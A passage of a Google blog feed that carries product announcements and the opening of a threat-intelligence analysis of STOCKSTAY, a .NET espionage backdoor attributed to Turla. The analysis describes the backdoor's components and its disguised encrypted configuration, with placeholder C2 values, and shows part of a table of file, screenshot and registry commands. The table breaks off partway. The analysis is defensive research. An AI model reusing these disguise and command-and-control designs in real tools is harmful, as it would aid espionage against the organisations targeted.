left;"&gt;&lt;li&gt;Google Workspace Admin Help: &lt;a href="https://knowledge.workspace.google.com/admin/users/access/turn-read-along-on-or-off-for-users" target="_blank"&gt;Turn Read Along on or off for users&lt;/a&gt;&lt;/li&gt;&lt;li&gt;Google Classroom Help: &lt;a href="https://support.google.com/edu/classroom/answer/14174515" target="_blank"&gt;Read Along in Google Classroom&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/div&gt;</content>
    <link href="http://workspaceupdates.googleblog.com/2026/06/read-along-in-google-classroom-is-now-available-to-all-education-users-to-support-foundational-literacy.html" rel="alternate"/>
    <category term="Workspace Updates"/>
    <published>2026-06-25T16:58:19+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/gemini-study-notebooks</id>
    <title>5 ways to learn with study notebooks in the Gemini app</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">mp4 reading "Meet study notebooks in Gemini"</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/gemini-study-notebooks" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/henry-county-public-schools</id>
    <title>How a Kentucky school district is scaling writing feedback with Gemini</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">An abstract illustration of the Gemini interface on a tablet, surrounded by colorful 3D icons including a graduation cap, stylized people, and a four-pointed star.</content>
    <link href="https://blog.google/products-and-platforms/products/education/henry-county-public-schools" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/google-org/education-ai-funding</id>
    <title>Google.org is funding three long-term partners on education and AI.</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">a person in a classroom</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/google-org/education-ai-funding" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/demand-gen-drop-june-2026</id>
    <title>Elevate your campaign performance with June’s Demand Gen Drop.</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Demand_Gen_Drops_10.max-600x600.format-webp.webp" /&gt;Our June Demand Gen Drop offers more ways to elevate campaign performance and engage new viewers on YouTube.</content>
    <link href="https://blog.google/products/ads-commerce/demand-gen-drop-june-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/collection-iste-june-2026</id>
    <title>ISTE 2026: Supporting teaching and learning with connected AI tools</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/ISTE_2026_Collections_BlogHeade.max-600x600.format-webp.webp" /&gt;The latest announcements from Google for Education at ISTE 2026.</content>
    <link href="https://blog.google/products-and-platforms/products/education/collection-iste-june-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/google-finance-updates-june-2026</id>
    <title>Our latest Google Finance upgrades, including a new app</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">The Google Finance logo, surrounded by elements of the user interface</content>
    <link href="https://blog.google/products-and-platforms/products/search/google-finance-updates-june-2026" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/search/google-finance-updates-june-2026/</id>
    <title>Our latest Google Finance upgrades, including a new app</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">The Google Finance logo, surrounded by elements of the user interface</content>
    <link href="https://blog.google/products-and-platforms/products/search/google-finance-updates-june-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/innovation-and-ai/products/gemini-app/gemini-study-notebooks/</id>
    <title>5 ways to learn with study notebooks in the Gemini app</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">mp4 reading "Meet study notebooks in Gemini"</content>
    <link href="https://blog.google/innovation-and-ai/products/gemini-app/gemini-study-notebooks/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/henry-county-public-schools/</id>
    <title>How a Kentucky school district is scaling writing feedback with Gemini</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">An abstract illustration of the Gemini interface on a tablet, surrounded by colorful 3D icons including a graduation cap, stylized people, and a four-pointed star.</content>
    <link href="https://blog.google/products-and-platforms/products/education/henry-county-public-schools/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/company-news/outreach-and-initiatives/google-org/education-ai-funding/</id>
    <title>Google.org is funding three long-term partners on education and AI.</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">We are announcing new funding at the 2026 ISTE conference to support two long-term partners.</content>
    <link href="https://blog.google/company-news/outreach-and-initiatives/google-org/education-ai-funding/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products/ads-commerce/demand-gen-drop-june-2026/</id>
    <title>Elevate your campaign performance with June’s Demand Gen Drop.</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/Demand_Gen_Drops_10.max-600x600.format-webp.webp" /&gt;Our June Demand Gen Drop offers more ways to elevate campaign performance and engage new viewers on YouTube.</content>
    <link href="https://blog.google/products/ads-commerce/demand-gen-drop-june-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://blog.google/products-and-platforms/products/education/collection-iste-june-2026/</id>
    <title>ISTE 2026: Supporting teaching and learning with connected AI tools</title>
    <updated>2026-06-25T16:00:00+00:00</updated>
    <content type="html">&lt;img src="https://storage.googleapis.com/gweb-uniblog-publish-prod/images/ISTE_2026_Collections_BlogHeade.max-600x600.format-webp.webp" /&gt;The latest announcements from Google for Education at ISTE 2026.</content>
    <link href="https://blog.google/products-and-platforms/products/education/collection-iste-june-2026/" rel="alternate"/>
    <category term="The Keyword"/>
    <published>2026-06-25T16:00:00+00:00</published>
  </entry>
  <entry>
    <id>https://googlecloudpresscorner.com/2026-06-25-Jack-Henry-and-Google-Cloud-Expand-Collaboration-to-Deliver-AI-Driven-Security-for-Banks-and-Credit-Unions</id>
    <title>Jack Henry and Google Cloud Expand Collaboration to Deliver AI-Driven Security for Banks and Credit Unions</title>
    <updated>2026-06-25T15:30:00+00:00</updated>
    <link href="https://googlecloudpresscorner.com/2026-06-25-Jack-Henry-and-Google-Cloud-Expand-Collaboration-to-Deliver-AI-Driven-Security-for-Banks-and-Credit-Unions" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-25T15:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://www.googlecloudpresscorner.com/2026-06-25-Jack-Henry-and-Google-Cloud-Expand-Collaboration-to-Deliver-AI-Driven-Security-for-Banks-and-Credit-Unions</id>
    <title>Jack Henry and Google Cloud Expand Collaboration to Deliver AI-Driven Security for Banks and Credit Unions</title>
    <updated>2026-06-25T15:30:00+00:00</updated>
    <link href="https://www.googlecloudpresscorner.com/2026-06-25-Jack-Henry-and-Google-Cloud-Expand-Collaboration-to-Deliver-AI-Driven-Security-for-Banks-and-Credit-Unions" rel="alternate"/>
    <category term="Google Cloud Press"/>
    <published>2026-06-25T15:30:00+00:00</published>
  </entry>
  <entry>
    <id>https://cloud.google.com/blog/topics/threat-intelligence/stockstay-turla-intelligence-gathering</id>
    <title>STOCKSTAY Another Day: The Latest Addition to Turla’s Intelligence Gathering Apparatus</title>
    <updated>2026-06-25T14:00:00+00:00</updated>
    <content type="html">&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;Written by: Jordan Jones&lt;/p&gt;
&lt;hr /&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;Introduction&lt;/span&gt;&lt;strong style="vertical-align: baseline;"&gt; &lt;/strong&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Google Threat Intelligence Group (GTIG) has conducted an in-depth analysis of a .NET backdoor, tracked as STOCKSTAY, that has been continually developed and deployed by the Russia-linked threat actor Turla (aka SUMMIT, Secret Blizzard, VENOMOUS BEAR, UAC-0194) since at least December 2022. Turla has deployed STOCKSTAY against government and military organizations in Ukraine, as well as entities with an interest in Italian foreign policy. Used for ongoing cyber espionage, this backdoor shares significant code and functional overlaps with KAZUAR, a successful toolkit previously attributed to Turla. The group has a long history of targeting a wide range of industries, with a particular focus on western Ministries of Foreign Affairs, and defense organizations within the context of heightened political tensions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Turla, and specifically their longstanding Snake implant, has been publicly &lt;/span&gt;&lt;a href="https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-129a" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;attributed&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; by the United States Cybersecurity and Infrastructure Security Agency (CISA) to Center 16 of Russia’s Federal Security Service (FSB). Turla is one of the oldest known cyber espionage groups with suspected activity dating back to &lt;/span&gt;&lt;a href="https://unit42.paloaltonetworks.com/turla-pensive-ursa-threat-assessment/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;at least 2004&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt;. The actor remains active and continues to evolve its delivery methods, as demonstrated by its &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/russia-targeting-signal-messenger/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;deployment of specialized scripts&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to intercept secure communications from Signal Messenger users, its &lt;/span&gt;&lt;a href="https://cloud.google.com/blog/topics/threat-intelligence/turla-galaxy-opportunity/"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;hijacking of legacy criminal botnets&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; to target Ukrainian organizations, and its &lt;/span&gt;&lt;a href="https://www.microsoft.com/en-us/security/blog/2026/05/14/kazuar-anatomy-of-a-nation-state-botnet/" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;recent campaigns&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; targeting military defense sectors using the highly sophisticated KAZUAR toolkit. As part of our continued tracking of this group, this blog post provides an overview of our STOCKSTAY analysis, includes a timeline of key developmental and operational observations, and examines its similarities to KAZUAR to contextualize this new capability within Turla’s ever-growing arsenal.&lt;/span&gt;&lt;/p&gt;
&lt;h3&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY Overview&lt;/span&gt;&lt;/h3&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY is a multi-component backdoor written in .NET, using the Windows Forms framework, which communicates with its command and control (C2) via a secure WebSocket connection, utilizing the open-source &lt;/span&gt;&lt;a href="https://github.com/sta/websocket-sharp" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;websocket-sharp&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; library. STOCKSTAY consists of several distinct components that communicate with one another via an inter-process communication (IPC) channel, based on the exchange of &lt;/span&gt;&lt;a href="https://learn.microsoft.com/en-us/windows/win32/dataxchg/wm-copydata" rel="noopener" target="_blank"&gt;&lt;span style="text-decoration: underline; vertical-align: baseline;"&gt;WM_COPYDATA&lt;/span&gt;&lt;/a&gt;&lt;span style="vertical-align: baseline;"&gt; messages. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY was originally designed to masquerade as a stock market data viewing tool, incorporating this disguise in both its file naming scheme and its storage of implant configuration, control messages, and response data. While initial versions of the malware observed by GTIG retained the internal aspects of this disguise, in 2025 we identified variants of STOCKSTAY masquerading as other benign applications, such as PDF viewers and calculator utilities.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-image_full_width"&gt;






  
    &lt;div class="article-module h-c-page"&gt;
      &lt;div class="h-c-grid"&gt;
  

    &lt;figure class="article-image--large
      
      
        h-c-grid__col
        h-c-grid__col--6 h-c-grid__col--offset-3
        
        
      "&gt;

      
      
        
        &lt;img alt="Overview of STOCKSTAY malware architecture" src="https://storage.googleapis.com/gweb-cloudblog-publish/images/stockstay-fig1.max-1000x1000.png" /&gt;
        
        &lt;/a&gt;
      
        &lt;figcaption class="article-image__caption "&gt;&lt;p&gt;Figure 1: Overview of STOCKSTAY malware architecture&lt;/p&gt;&lt;/figcaption&gt;
      
    &lt;/figure&gt;

  
      &lt;/div&gt;
    &lt;/div&gt;
  




&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKBROKER is a proxy-aware tunneler which provides network communication capabilities to the wider STOCKSTAY ecosystem. STOCKSTAY.STOCKBROKER, internally referred to as "&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;net&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;", can be instructed to establish a secure WebSocket connection to a specified remote server, after which it acts as a relay between the server and the STOCKSTAY.STOCKMARKET orchestrator. As a result, all C2 communication between STOCKSTAY and the configured C2 server are handled by STOCKSTAY.STOCKBROKER, isolating the malware’s network communications from other malicious host-based activity on the infected machine. &lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET, internally referred to as “&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;cor&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;”, is the orchestrator of the STOCKSTAY ecosystem, and enables the implant’s configurability. The malware’s configuration is loaded from an encrypted on-disk configuration file which specifies several options regarding the malware’s execution, including the details of the remote WebSocket server required by STOCKSTAY.STOCKBROKER. The configuration file attempts to disguise itself as a legitimate file by including various legitimate URLs associated with cryptocurrency markets, as well as falsified descriptions of each configuration field (Figure 2). Encrypted configuration data is embedded within the decoy fields, which is decrypted by STOCKSTAY.STOCKMARKET.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;{
  "Name": "StockMarket",
  "Description": "An application for getting information about current events on trading platforms. To set the time for updating information, enter a value in minutes in the `Interval` field. In the future, support for themes will be added. The `SystemConfiguration` field stores the system settings of the application. In the `services` field, fill in the list of addresses of services that provide the `WebSocket protocol`.",
  "Theme": "Dark",
  "SystemConfiguration": [
    "1D.AA.79.9F.45.AA.04.B3.&amp;lt;snipped&amp;gt;.68.0A.5D.A3.E6.A3.82.FA",
    "6F.41.4D.6D.C3.20.E5.32.&amp;lt;snipped&amp;gt;.00.B8.26.DF.E1.13.0A.21",
    "4.4.3.12"
  ],
  "Interval": 10,
  "Services": [
    "wss://ws-api.binance.com:443/ws-api/v3",
    "wss://ws-feed.exchange.coinbase.com",
    "wss://ws-feed-public.sandbox.exchange.coinbase.com",
    "wss://stream.bybit.com/v5/public/spot",
    "wss://stream.bybit.com/v5/public/linear"
  ],
  "Version": "2022-12-21"
}&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 2: Encrypted STOCKSTAY configuration file format, falsely describing itself as an application for trading information&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;pre class="language-plain"&gt;&lt;code&gt;{
  "internal_id": "&amp;lt;server_identifier&amp;gt;",
  "internal_key": "&amp;lt;server_public_key&amp;gt;",
  "interval_engine": "600000",
  "level_info": "0",
  "time_scale": "1",
  "span_min": "9",
  "span_max": "18",
  "rate": "2700",
  "rate_control": "false",
  "service": "&amp;lt;websocket_c2_url&amp;gt;",
  "days_not_work": "Saturday;Sunday;",
  "system_properties": "eyJzeXN0ZW1fZGF0YV9zaXplIjoiNDAwMDAwIn0="
}&lt;/code&gt;&lt;/pre&gt;
&lt;p style="text-align: center;"&gt;&lt;span style="color: #5f6368; display: block; font-size: 16px; font-style: italic; margin-top: 8px; width: 100%;"&gt;&lt;span style="vertical-align: baseline;"&gt;Figure 3: Decrypted STOCKSTAY configuration file format (extracted from &lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;SystemConfiguration&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt; field)&lt;/span&gt;&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKMARKET communicates with STOCKSTAY.STOCKBROKER in order to provide details of the WebSocket server, and to subsequently send and receive messages via the established WebSocket connection, usually containing the results of executed commands. STOCKSTAY.STOCKMARKET also communicates with the STOCKSTAY.STOCKTRADER component in order to issue commands to be executed on the infected host.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;On first execution, STOCKSTAY.STOCKMARKET generates a unique 4096-bit RSA key pair, to be used throughout the implant’s lifecycle to encrypt outbound data prior to being sent via WebSocket. The implant’s public key is sent to the server in the malware’s first request, to enable the server to decrypt task responses. STOCKSTAY.STOCKMARKET also generates a unique infection identifier to be used by the C2 server to determine the intended receiver of tasking. STOCKSTAY’s configuration file specifies an &lt;/span&gt;&lt;span style="vertical-align: baseline;"&gt;“&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;internal_id&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;” field, which GTIG assesses represents an identifier for the server-side component of the malware ecosystem. We assess that this identifier is used by the malware’s operators to retrieve responses from interim C2 servers which may be used by multiple operators. To date, GTIG has observed only a single unique value for this identifier and is unable to determine whether multiple operators are leveraging STOCKSTAY at this time due to insufficient telemetry.&lt;/span&gt;&lt;/p&gt;
&lt;h4&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER&lt;/span&gt;&lt;/h4&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;STOCKSTAY.STOCKTRADER, internally referred to as “&lt;/span&gt;&lt;code style="vertical-align: baseline;"&gt;sys&lt;/code&gt;&lt;span style="vertical-align: baseline;"&gt;”, is the backdoor component of the STOCKSTAY ecosystem, and supports a range of registry, file, and command execution operations on the infected host, as detailed in Table 1.&lt;/span&gt;&lt;/p&gt;&lt;/div&gt;
&lt;div class="block-paragraph_advanced"&gt;&lt;div align="center"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;
&lt;div style="color: #5f6368; width: 100%;"&gt;&lt;table border="1px" cellpadding="16px" style="border-collapse: collapse; width: 100%;"&gt;&lt;colgroup&gt;&lt;col /&gt;&lt;col /&gt;&lt;/colgroup&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Task Command Name&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;th scope="col" style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p style="text-align: left;"&gt;&lt;span style="vertical-align: baseline;"&gt;Description&lt;/span&gt;&lt;/p&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Del&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete the specified files.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of file paths, each of which will be deleted. Confirmation of each deleted file, or deletion failure, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Dir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Generate a listing of the specified directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be enumerated with the paths of all contained files and subdirectories being returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Optionally performs recursive directory listing.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Get&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Retrieve one or more specified files. Allows for collection of files with specific extensions.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of file or directory paths, and a list of target file extensions. If a file path is included in the list, this file will be returned. If instead a directory path is included in the list, the malware will perform an optionally recursive search of the directory to identify any files matching the target file extensions. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;All files matching either the specified file paths, or the target file extensions, will be added to an in-memory ZIP archive and subsequently base64-encoded for transmission to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Image&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Perform a screen-capture of the victim’s screen.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;The resultant image is base64-encoded for transmission to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MkDir&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Create one or more directories.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of directory paths, each of which will be created. Confirmation of each created directory, or any resultant error, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;MultyTask&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Process multiple tasks at once.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a semi-colon-separated list of tasks, each of which must be a serialized JSON object containing an individual task.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Each task is submitted to the malware’s command-manager in-turn, with all command output being discarded; no data is returned to the C2 when processing multiple tasks at once.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;Put&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Upload a file to the device.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a base64-encoded string representation of the file content to be written to the specified filepath. The required file write operation is performed in “Append” mode.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Confirmation of file upload, or details of any relevant error, is returned to the C2.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegDelete&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Delete a registry value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name to delete.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegRead&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Read a registry value.&lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name to read.&lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;code style="vertical-align: baseline;"&gt;RegWrite&lt;/code&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;td style="vertical-align: middle; border: 1px solid #000000; padding: 16px;"&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Set a registry value. &lt;/span&gt;&lt;/p&gt;
&lt;p&gt;&lt;span style="vertical-align: baseline;"&gt;Requires a registry key and corresponding value name, as well as the value and data type used to populate the registry value. &lt;/span&gt;&lt;/p&gt;
&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
